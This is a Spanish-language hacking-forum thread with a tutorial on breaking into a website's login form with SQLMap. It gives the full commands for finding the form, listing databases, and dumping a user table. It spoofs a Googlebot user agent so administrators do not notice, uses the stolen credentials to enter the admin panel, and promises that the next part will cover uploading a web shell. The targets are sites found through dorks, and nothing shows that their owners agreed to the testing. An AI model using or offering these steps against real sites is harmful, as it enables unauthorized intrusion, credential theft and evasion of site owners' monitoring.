Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Realizando un ataque de SQLi desde 0 con SQLMap

  • 1 Respuestas
  • 3537 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado m0rf30

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Julio 15, 2016, 10:39:18 pm »
Hola Hackers.

Continuando con nuestro pentest anterior resumimos lo siguiente:


  1.- Aprendimos un poco sobre Dorks.
  2.- Como podríamos pensar como Hackers.
  3.- Formular nuestros Dork’s.
  4.- Encontrar nuestra pagina vulnerable.


Muy bien ya aclarado eso vamos a lo siguiente. Creo que si esta leyendo esto es porque estas interesado en el tema, así que si por alguna razón te trabas o no entiendes algo lo buscaras por tu cuenta (ya sabes como buscar  :) ) entonces no entrare en el dilema de toda la vida.


“Debes saber como funcionan las cosas”


Si, eso esta mas que claro, porque existen personas que creen que no se deberían de usar las herramientas hasta que se aprende a hacer las cosas de forma manual pero quien soy yo para decirles que hacer y que no hacer  ::) el punto es que comenzaremos a utilizar la herramienta SQLMAP y algunos de sus comandos u opciones de uso

Yo trabajare en el sistema Kali Linux 2.0 el cual es un sistema operativo basado en Debian. Si usan Wind0$ les dejo un link de como instalar SQLMAP.

Vamos pues.



Tenemos nuestro sitio por lo tanto nuestra url y nuestro panel de ingreso.


Existen dos formas de hacer una SQLi método POST en SQLMAP.
Tenemos nuestro sitio por lo tanto nuestra url y nuestro panel de ingreso.

La primera tendría una forma más o menos así:

Código: Text
  1. sqlmap -u “http://www.sitiovulnerable.com/login.asp” –method=POST –data=”usr=&pass=” -p usr –dbs
  2.  

pero en versiones recientes de SQLMAP esto a sido reemplazado por un solo parámetro, comando u opción (como le quieran llamar ).

pero en versiones recientes de SQLMAP esto a sido reemplazado por un solo parámetro, comando u opción (como le quieran llamar  ).

Código: Text
  1. sqlmap -u http://www.sitiovulnerable.com/login.asp –forms –dbs

Es mejor no??
Nosotros usaremos la segunda

Código: Text
  1. sqlmap -u http://www.paginavulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent=”Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)”  –level=5 –risk=3 –dbs

ahahaha D:

Pero si dijimos que usaríamos la segunda no ??

un así estamos usando la segunda pero con un poco mas de precaución veamos uno por uno los comando.

    -u = indica la URL o dirección web
    –forms = le indica a SQLMAP que busque los formularios de dicha dirección y extraiga lo que pasarían a ser los datos o consultas que enviaremos en método POST.
    –dbms = El tipo de sistema que administra la base de datos en este caso MicrosoftSqlServer recuerdan??



Atención aquí a esto me refería con precaución.

    –user-agent = sencillo, al usar SQLMAP para nuestras pruebas los servidores guardan en sus logs todo lo que sucede desde una visita y si claro hasta las consultas de SQLMAP. La misma web de sqlmap nos lo dice



así que para no levantar tantas sospechas a un admin bien listo, pues haremos que nuestro Amigo Google nos ayude (

http://www.google.com/bot.html), lo que hacemos es utilizar a Google, nos disfrazamos como si fuésemos el mismo haciendo peticiones a la pagina atacada.

–level = El numero de pruebas que realizara Sqlmap.
–risk = El riesgo de pruebas que realizara Sqlmap.
–dbs = Que obtenga las Bases de datos


Ven lo que les dije primero busca formularios, después encuentra el primero y por ultimo nos pregunta como lo queremos hacer y que queremos hacer con ese formulario.

Veamos que resultados nos dio >:)

Vaya tiene 30 bases de datos podríamos probar una por una hasta encontrar el usuario y contraseña o mejor aun hacer un –dump-all :D

Pero seria muy tardado mejor intentemos con este comando.

–current-db
Lo que hará este comando será darnos el nombre de la base de datos sobre la cual esta trabajando la inyección.



 Ya esta bueno pues ahora saquemos el usuario y la contraseña.

Código: Text
  1. sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent=”Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)”  –level=5 –risk=3 -D baseDeDatos -T Usuario –columns




Muy bien ahora vaciemos los datos.

Código: Text
  1. sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL
  2. –user-agent=”Mozilla 5 (compatible , Googlebot/2.1,
  3. http://www.google.com/bot.html)”  –level=5 –risk=3 -D baseDeDatos -T
  4. Usuario –columns –dump




Ok ya tenemos las credenciales de inicio  ;)ya tenemos casi todo jajaja.

Regresemos al panel de admin y ingresemos los datos.




:O entramos !!!
Bueno eso es todo en esta parte hacker’s pero nos leemos la próxima donde enfrentaremos algo mas que SQLi, ya que lo siguiente es subir una shell a la web para poder hacer más cosas.

Fuente: http://www.hackingpublico.net/sql-injection-cuando-la-inyeccion-falla-ii/
Saludos Hacker’s.
« Última modificación: Julio 18, 2016, 10:25:28 am por EPSILON »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5487
  • Actividad:
    21.67%
  • Reputación 35
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Julio 16, 2016, 10:59:28 am »
Muy buenos papers! Dudo que en este foro tengamos hackers.. somos todos aprendices!
Cuando leí el titulo SQLi desde cero, pensé que sería inyectando manualmente y no usando herramientas que hacen todo por ti. De igual forma esta todo muy bien explicado!

Muchas gracias por tu aporte!! Espero la siguiente parte!

Saludos,
ANTRAX


 

¿Te gustó el post? COMPARTILO!



WhoUr herramienta para recopilar informacion de una web y buscar webs a vul sqli

Iniciado por jopcode

Respuestas: 0
Vistas: 2873
Último mensaje Noviembre 30, 2017, 10:57:00 pm
por jopcode
[Video- español] Curso de SQL INJECTION (SQLI) - Básico a Avanzado

Iniciado por Franciscodc

Respuestas: 1
Vistas: 6700
Último mensaje Agosto 29, 2018, 02:50:31 am
por Lmntr1x
Que hacer después de explotar un SQLi

Iniciado por ANTRAX

Respuestas: 5
Vistas: 8594
Último mensaje Abril 13, 2018, 02:59:18 pm
por Psychic
Dorks Inyeccion SQLi

Iniciado por #;вℓσχχ0ʁ#!

Respuestas: 3
Vistas: 5491
Último mensaje Noviembre 09, 2014, 12:34:20 pm
por Y3K
Uso de ZAP - SQLI y XSS

Iniciado por xyz

Respuestas: 1
Vistas: 3885
Último mensaje Octubre 09, 2017, 08:18:02 pm
por Blackwings